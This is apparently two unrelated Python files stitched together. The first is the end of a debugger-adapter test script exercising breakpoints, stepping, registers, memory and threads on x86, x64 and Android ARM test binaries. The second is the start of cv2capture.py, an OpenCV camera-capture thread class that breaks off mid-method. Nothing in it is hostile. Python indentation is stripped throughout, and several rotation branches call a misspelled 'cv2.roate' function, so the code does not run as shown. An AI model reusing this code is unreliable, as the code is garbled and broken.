if not ('x86' in tb) or ('x64' in tb): continue
utils.green('testing %s' % tb)
testbin = tb
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
# segfault
adapter.exec(fpath, ['segfault'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.ACCESS_VIOLATION)
adapter.quit()
# illegal instruction
adapter.exec(fpath, ['illegalinstr'])
(reason, extra) = go_initial(adapter)
expect_bad_instruction(reason)
adapter.quit()
# breakpoint, single step, exited
adapter.exec(fpath, ['fakearg'])
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
adapter.breakpoint_clear(entry)
#print('rip: ', adapter.reg_read('rip'))
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# divzero
adapter.exec(fpath, ['divzero'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.CALCULATION)
adapter.quit()
# assembler x86/x64 tests
for tb in testbins:
if not (tb.startswith('asmtest_x64') or tb.startswith('asmtest_x86')): continue
utils.green('testing %s' % tb)
testbin = tb
# parse entrypoint information
fpath = testbin_to_fpath()
(load_addr, entry_offs) = parse_image(fpath)
entry = load_addr + entry_offs
# tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath, '')
xip = 'eip' if 'x86' in tb else 'rip'
loader = adapter.reg_read(xip) != entry
if loader: print('entrypoint is the program, no library or loader')
else: print('loader detected, gonna step a few times for fun')
# a few steps in the loader
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# set bp entry
print('setting entry breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# few more steps
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go to entry
(reason, extra) = go_initial(adapter)
assert_equality(adapter.reg_read(xip), entry)
adapter.breakpoint_clear(entry)
# step into nop
adapter.step_into()
assert_equality(adapter.reg_read(xip), entry+1)
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read(xip), entry+6)
adapter.step_into()
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read(xip), entry+12)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
print('PASS!')
# helloworld x86/x64, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not ('_x64-' in tb or '_x86-' in tb): continue
if '_thread' in tb: continue
utils.green('hellworld x86/x64, no threads, testing %s' % tb)
testbin = tb
# tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
adapter.exec(fpath, '')
entry = confirm_initial_module(adapter)
if '_x86-' in tb:
(bits, xip, xax, xbx) = (32, 'eip', 'eax', 'ebx')
(testval_a, testval_b) = (0xDEADBEEF, 0xCAFEBABE)
else:
(bits, xip, xax, xbx) = (64, 'rip', 'rax', 'rbx')
(testval_a, testval_b) = (0xAAAAAAAADEADBEEF, 0xBBBBBBBBCAFEBABE)
print('%s: 0x%X' % (xip, adapter.reg_read(xip)))
# breakpoint set/clear should fail at 0
print('expect breakpoint clear failure at 0')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
print('expect breakpoint set failure at 0')
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
assert_equality(adapter.reg_read(xip), entry)
adapter.breakpoint_clear(entry)
# single step until it wasn't over a call
while 1:
addr = adapter.reg_read(xip)
data = adapter.mem_read(addr, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0)
print('%s: 0x%X %s' % (xip, addr, asmstr))
(reason, info) = adapter.step_into()
expect_single_step(reason)
if asmstr.startswith('call'): continue
if asmstr.startswith('jmp'): continue
break
addr2 = adapter.reg_read(xip)
print('%s: 0x%X' % (xip, addr2))
assert_equality(addr + asmlen, addr2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits(xax), bits)
assert_equality(adapter.reg_bits(xbx), bits)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
rax = adapter.reg_read(xax)
rbx = adapter.reg_read(xbx)
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write(xax, testval_a)
assert_equality(adapter.reg_read(xax), testval_a)
adapter.reg_write(xbx, testval_b)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read(xbx), testval_b)
adapter.reg_write(xax, rax)
assert_equality(adapter.reg_read(xax), rax)
adapter.reg_write(xbx, rbx)
assert_equality(adapter.reg_read(xbx), rbx)
print('mem read/write')
addr = adapter.reg_read(xip)
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
print('quiting')
adapter.quit()
adapter = None
# helloworlds x86/x64 with threads
for tb in testbins:
if not tb.startswith('helloworld_thread'): continue
if not ('_x86-' in tb or '_x64-' in tb): continue
utils.green('testing %s' % tb)
testbin = tb
# for x64 machine, tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
adapter.exec(fpath, '')
entry = confirm_initial_module(adapter)
if '_x86-' in tb: xip = 'eip'
else: xip = 'rip'
print('scheduling break in 1 second')
threading.Timer(1, break_into, [adapter]).start()
print('going')
(reason, extra) = go_initial(adapter)
print('back')
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
print('asking for threads')
if platform.system() == 'Windows':
# main thread at WaitForMultipleObjects() + 4 created threads + debugger thread
nthreads_expected = 6
else:
# main thread at pthread_join() + 4 created threads
nthreads_expected = 5
tids = adapter.thread_list()
if len(tids) != nthreads_expected:
print('expected %d threads, but len(tids) is %d' % (nthreads_expected, len(tids)))
assert False
tid_active = adapter.thread_selected()
addrs = []
for tid in tids:
adapter.thread_select(tid)
addr = adapter.reg_read(xip)
addrs.append(addr)
seltxt = '<--' if tid == tid_active else ''
print('thread %02d: %s=0x%016X %s' % (tid, xip, addr, seltxt))
if not is_wow64():
# on wow64, wow64cpu!TurboDispatchJumpAddressEnd+0x544 becomes common thread jump from point
assert addrs[0] != addrs[1] # thread at WaitForMultipleObjects()/pthread_join() should be different
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
secs = 1
print('scheduling break in %d second(s)' % secs)
threading.Timer(secs, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('checking for %d threads' % nthreads_expected)
assert_equality(len(adapter.thread_list()), nthreads_expected)
# ensure the eip/rip are in different locations (that the continue actually continued)
addrs2 = []
for tid in tids:
adapter.thread_select(tid)
addr2 = adapter.reg_read(xip)
addrs2.append(addr2)
if not is_wow64():
print('checking that at least one thread progressed')
if list(filter(lambda x: not x, [addrs[i]==addrs2[i] for i in range(len(addrs))])) == []:
print('did any threads progress?')
print('addrs: ', map(hex,addrs))
print('addrs2: ', map(hex,addrs2))
assert False
print('done')
adapter.quit()
#--------------------------------------------------------------------------
# {ARMV7,AARCH64}-ANDROID TESTS
#--------------------------------------------------------------------------
# helloworld armv7, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not '_armv7-' in tb: continue
if '_thread' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
# breakpoint set/clear should fail at 0
print('breakpoint failures')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, info) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
pc = adapter.reg_read('pc')
print('pc: 0x%X' % pc)
assert_equality(pc, entry)
# single step
data = adapter.mem_read(pc, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0, 'armv7')
adapter.breakpoint_clear(entry)
(reason, info) = adapter.step_into()
assert_equality(reason, DebugAdapter.STOP_REASON.SINGLE_STEP)
pc2 = adapter.reg_read('pc')
print('pc2: 0x%X' % pc2)
assert_equality(pc + asmlen, pc2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits('r0'), 32)
assert_equality(adapter.reg_bits('r4'), 32)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
r0 = adapter.reg_read('r0')
r4 = adapter.reg_read('r4')
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write('r0', 0xDEADBEEF)
assert_equality(adapter.reg_read('r0'), 0xDEADBEEF)
adapter.reg_write('r4', 0xCAFEBABE)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read('r4'), 0xCAFEBABE)
adapter.reg_write('r0', r0)
assert_equality(adapter.reg_read('r0'), r0)
adapter.reg_write('r4', r4)
assert_equality(adapter.reg_read('r4'), r4)
print('mem read/write')
addr = adapter.reg_read('pc')
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
print('quiting')
adapter.quit()
adapter = None
# helloworld with threads
# architectures: armv7, aarch64
for tb in testbins:
if not tb.startswith('helloworld_thread_'): continue
if not (('_armv7-' in tb) or ('_aarch64-' in tb)): continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
print('scheduling break in 1 seconds')
threading.Timer(.3, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
print('asking for threads')
tids = adapter.thread_list()
assert_equality(len(tids), 5)
tid_active = adapter.thread_selected()
pcs = []
for tid in tids:
adapter.thread_select(tid)
pc = adapter.reg_read('pc')
pcs.append(pc)
seltxt = '<--' if tid == tid_active else ''
print('thread %02d: pc=0x%016X %s' % (tid, pc, seltxt))
assert pcs[0] != pcs[1] # thread at WaitForMultipleObjects()/pthread_join() should be different
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
secs = 1
print('scheduling break in %d second(s)' % secs)
threading.Timer(secs, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('checking for %d threads' % 5)
assert_equality(len(adapter.thread_list()), 5)
# ensure the pc's are in different locations (that the continue actually continued)
pcs2 = []
for tid in tids:
adapter.thread_select(tid)
pcs2.append(adapter.reg_read('pc'))
print('checking that at least one thread progressed')
#print(' pcs: ', pcs)
#print('pcs2: ', pcs2)
if list(filter(lambda x: not x, [pcs[i]==pcs2[i] for i in range(len(pcs))])) == []:
print('did any threads progress?')
print(' pcs: ', pcs)
print('pcs2: ', pcs2)
assert False
print('done')
adapter.quit()
# exception test
for tb in testbins:
if not tb.startswith('do_exception'): continue
if not '-android' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
# segfault
(adapter, entry) = android_test_setup(['segfault'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.ACCESS_VIOLATION)
adapter.quit()
# illegal instruction
(adapter, entry) = android_test_setup(['illegalinstr'])
(reason, extra) = go_initial(adapter)
expect_bad_instruction(reason)
adapter.quit()
# breakpoint, single step, exited
(adapter, entry) = android_test_setup(['fakearg'])
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
adapter.breakpoint_clear(entry)
#print('rip: ', adapter.reg_read('rip'))
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# divzero
# https://community.arm.com/developer/ip-products/processors/b/processors-ip-blog/posts/divide-and-conquer
# ARMv7-A - divide by zero always returns a zero result.
# ARMv7-R - the SCTLR.DZ bit controls whether you get a zero result or a Undefined Instruction exception when you attempt to divide by zero (the default is to return zero).
# ARMv7-M - the CCR.DIV_0_TRP bit controls whether an exception is generated. If this occurs, it will cause a UsageFault and the UFSR.DIVBYZERO bit will indicate the reason for the fault.
#(adapter, entry) = android_test_setup(['divzero'])
#if 'aarch64' in tb:
# # aarch64 compiled binaries divide by 0 just fine, return "inf" *shrug*
# assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
#else:
# assert_equality(reason, DebugAdapter.STOP_REASON.CALCULATION)
#adapter.quit()
# assembler test
# architectures: armv7, aarch64
for tb in filter(lambda x: x.startswith('asmtest_armv7') or x.startswith('asmtest_aarch64'), testbins):
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
loader = adapter.reg_read('pc') != entry
if loader:
print('entrypoint is the program, no library or loader')
else:
print('loader detected, gonna step a few times for fun')
# a few steps in the loader
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# set bp entry
print('setting entry breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# few more steps
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go to entry
adapter.go()
assert_equality(adapter.reg_read('pc'), entry)
adapter.breakpoint_clear(entry)
# step into nop
adapter.step_into()
assert_equality(adapter.reg_read('pc'), entry+4)
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read('pc'), entry+8)
adapter.step_into()
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read('pc'), entry+16)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# helloworld aarch64, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not '_aarch64-' in tb: continue
if '_thread' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
# breakpoint set/clear should fail at 0
print('breakpoint failures')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, info) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
pc = adapter.reg_read('pc')
print('pc: 0x%X' % pc)
assert_equality(pc, entry)
# single step
data = adapter.mem_read(pc, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0, 'armv7')
adapter.breakpoint_clear(entry)
(reason, info) = adapter.step_into()
expect_single_step(reason)
pc2 = adapter.reg_read('pc')
print('pc2: 0x%X' % pc2)
assert_equality(pc + asmlen, pc2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits('x0'), 64)
assert_equality(adapter.reg_bits('x4'), 64)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
x0 = adapter.reg_read('x0')
x4 = adapter.reg_read('x4')
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write('x0', 0xDEADBEEF)
assert_equality(adapter.reg_read('x0'), 0xDEADBEEF)
adapter.reg_write('x4', 0xCAFEBABE)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read('x4'), 0xCAFEBABE)
adapter.reg_write('x0', x0)
assert_equality(adapter.reg_read('x0'), x0)
adapter.reg_write('x4', x4)
assert_equality(adapter.reg_read('x4'), x4)
print('mem read/write')
addr = adapter.reg_read('pc')
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
if not '_loop' in tb:
print('going')
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
print('quiting')
adapter.quit()
adapter = None
utils.green('TESTS PASSED!')
|
cv2capture.py
|
###############################################################################
# OpenCV video capture
# Uses opencv video capture to capture system's camera
# Adapts to operating system and allows configuation of codec
# Urs Utzinger
#
# 2021 Initialize, Remove Frame acces (use only queue)
# 2019 Initial release, based on Bitbuckets FRC 4183 code
###############################################################################
###############################################################################
# Imports
###############################################################################
# Multi Threading
from threading import Thread, Lock
from queue import Queue
# System
import logging, time, sys
# Open Computer Vision
import cv2
###############################################################################
# Video Capture
###############################################################################
class cv2Capture(Thread):
"""
This thread continually captures frames from a camera
"""
# Initialize the Camera Thread
# Opens Capture Device and Sets Capture Properties
############################################################################
def __init__(self, configs,
camera_num: int = 0,
res: tuple = None, # width, height
exposure: float = None,
queue_size: int = 32):
# populate desired settings from configuration file or function arguments
####################################################################
self._camera_num = camera_num
if exposure is not None:
self._exposure = exposure
else:
self._exposure = configs['exposure']
if res is not None:
self._camera_res = res
else:
self._camera_res = configs['camera_res']
self._output_res = configs['output_res']
self._output_width = self._output_res[0]
self._output_height = self._output_res[1]
self._framerate = configs['fps']
self._flip_method = configs['flip']
self._buffersize = configs['buffersize'] # camera drive buffer size
self._fourcc = configs['fourcc'] # camera sensor encoding format
self._autoexposure = configs['autoexposure'] # autoexposure depends on camera
self.capture = Queue(maxsize=queue_size)
self.log = Queue(maxsize=32)
self.stopped = True
self.cam_lock = Lock()
# open up the camera
self._open_cam()
# Init vars
self.frame_time = 0.0
self.measured_fps = 0.0
Thread.__init__(self)
# Thread routines #################################################
# Start Stop and Update Thread
###################################################################
def stop(self):
"""stop the thread"""
self.stopped = True
# clean up
def start(self):
"""set the thread start conditions"""
self.stopped = False
T = Thread(target=self.update)
T.daemon = True # run in background
T.start()
# After Stating of the Thread, this runs continously
def update(self):
"""run the thread"""
last_time = time.time()
num_frames = 0
while not self.stopped:
current_time = time.time()
if self.cam is not None:
with self.cam_lock:
_, img = self.cam.read()
num_frames += 1
self.frame_time = int(current_time*1000)
if (img is not None) and (not self.capture.full()):
if (self._output_height > 0) or (self._flip_method > 0):
# adjust output height
img_resized = cv2.resize(img, self._output_res)
# flip resized image
if self._flip_method == 0: # no flipping
img_proc = img_resized
elif self._flip_method == 1: # ccw 90
img_proc = cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif self._flip_method == 2: # rot 180, same as flip lr & up
img_proc = cv2.roate(img_resized, cv2.ROTATE_180)
elif self._flip_method == 3: # cw 90
img_proc = cv2.roate(img_resized, cv2.ROTATE_90_CLOCKWISE)
elif self._flip_method == 4: # horizontal
img_proc = cv2.flip(img_resized, 0)
elif self._flip_method == 5: # upright diagonal. ccw & lr
img_proc = cv2.flip(cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1)
elif self._flip_method == 6: # vertical
img_proc = cv2.flip(img_resized, 1)
elif self._flip_method == 7: # upperleft diagonal
img_proc = cv2.transpose(img_resized)
else:
img_proc = img_resized # not a valid flip method
else:
img_proc = img
self.capture.put_nowait((self.frame_time, img_proc))
else:
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Capture Queue is full!"))
# FPS calculation
if (current_time - last_time) >= 5.0: # update frame rate every 5 secs
self.measured_fps = num_frames/5.0
if not self.log.full(): self.log.put_nowait((logging.INFO, "CAM:FPS:{}".format(self.measured_fps)))
last_time = current_time
num_frames = 0
self.cam.release()
# Setup the Camera
############################################################################
def _open_cam(self):
"""
Open up the camera so we can begin capturing frames
"""
# Open the camera with platform optimal settings
if sys.platform.startswith('win'):
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_DSHOW) # CAP_VFW or CAP_DSHOW or CAP_MSMF or CAP_ANY
elif sys.platform.startswith('darwin'):
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_AVFOUNDATION)
elif sys.platform.startswith('linux'):
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_V4L2)
else:
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_ANY)
self.cam_open = self.cam.isOpened()
if self.cam_open:
# Apply settings to camera
self.height = self._camera_res[1] # image resolution
self.width = self._camera_res[0] # image resolution
self.exposure = self._exposure # camera exposure
self.autoexposure = self._autoexposure # autoexposure
self.fps = self._framerate # desired fps
self.buffersize = self._buffersize # camera drive buffer size
self.fourcc = self._fourcc # camera sensor encoding format
# Update records
self._camera_res = self.resolution
self._exposure = self.exposure
self._buffersize = self.buffersize
self._framerate = self.fps
self._autoexposure = self.autoexposure
self._fourcc = self.fourcc
self._fourcc_str = self.decode_fourcc(self._fourcc)
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to open camera!"))
# Camera routines #################################################
# Reading and setting camera options
###################################################################
@property
def width(self):
""" returns video capture width """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH))
else: return -1
@width.setter
def width(self, val):
""" sets video capture width """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Width not changed to {}".format(val)))
return
if self.cam_open and val > 0:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, val):
# self._camera_res = (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self._camera_res[1]))
# HEIGHT and WIDTH only valid if both were set
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set width to {}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set width, camera not open!"))
@property
def height(self):
""" returns videocapture height """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: return -1
@height.setter
def height(self, val):
""" sets video capture height """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Height not changed:{}".format(val)))
return
if self.cam_open and val > 0:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val)):
# self._camera_res = (int(self._camera_res[0]), int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# HEIGHT and WIDTH only valid if both were set
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set height to {}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set height, camera not open!"))
@property
def resolution(self):
""" returns current resolution width x height """
if self.cam_open:
return (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
else: return (-1, -1)
@resolution.setter
def resolution(self, val):
if val is None: return
if self.cam_open:
if len(val) > 1: # have width x height
self.width = int(val[0])
self.height = int(val[1])
else: # given only one value for resolution
self.width = int(val)
self.height = int(val)
self._camera_res = (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
else: # camera not open
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set resolution, camera not open!"))
@property
def exposure(self):
""" returns curent exposure """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_EXPOSURE)
else: return float("NaN")
@exposure.setter
def exposure(self, val):
""" # sets current exposure """
if (val is None):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set exposure to {}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_EXPOSURE, val):
self._exposure = self.cam.get(cv2.CAP_PROP_EXPOSURE)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Exposure:{}".format(self.exposure)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set expsosure to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set exposure, camera not open!"))
@property
def autoexposure(self):
""" returns curent exposure """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE))
else: return -1
@autoexposure.setter
def autoexposure(self, val):
""" sets autoexposure """
if (val is None):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skippingt set Autoexposure to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, val):
self._autoexposure = self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Autoexposure:{}".format(self.autoexposure)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set Autoexposure to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set auto exposure, camera not open!"))
@property
def fps(self):
""" returns current frames per second setting """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FPS)
else: return float("NaN")
@fps.setter
def fps(self, val):
""" set frames per second in camera """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set framerate to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FPS, val):
self._framerate = self.cam.get(cv2.CAP_PROP_FPS)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FPS:{}".format(self.fps)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FPS to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set framerate, camera not open!"))
@staticmethod
def decode_fourcc(val):
""" decode the fourcc integer to the chracter string """
return "".join([chr((int(val) >> 8 * i) & 0xFF) for i in range(4)])
@property
def fourcc(self):
""" return video encoding format """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FOURCC))
else: return "None"
@fourcc.setter
def fourcc(self, val):
""" set video encoding format in camera """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set FOURCC to:{}".format(val)))
return
if self.cam_open:
if isinstance(val, str): # fourcc is a string
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(val[0],val[1],val[2],val[3])):
self._fourcc = self.cam.get(cv2.CAP_PROP_FOURCC)
self._fourcc_str = self.decode_fourcc(self._fourcc)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(val)))
else: # fourcc is integer/long
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FOURCC, val):
self._fourcc = int(self.cam.get(cv2.CAP_PROP_FOURCC))
self._fourcc_str = self.decode_fourcc(self._fourcc)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set fourcc, camera not open!"))
@property
def buffersize(self):
""" return opencv camera buffersize """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_BUFFERSIZE))
else: return float("NaN")
@buffersize.setter
def buffersize(self, val):
""" set opencv camera buffersize """
if val is None or val < 0:
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set buffer size to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
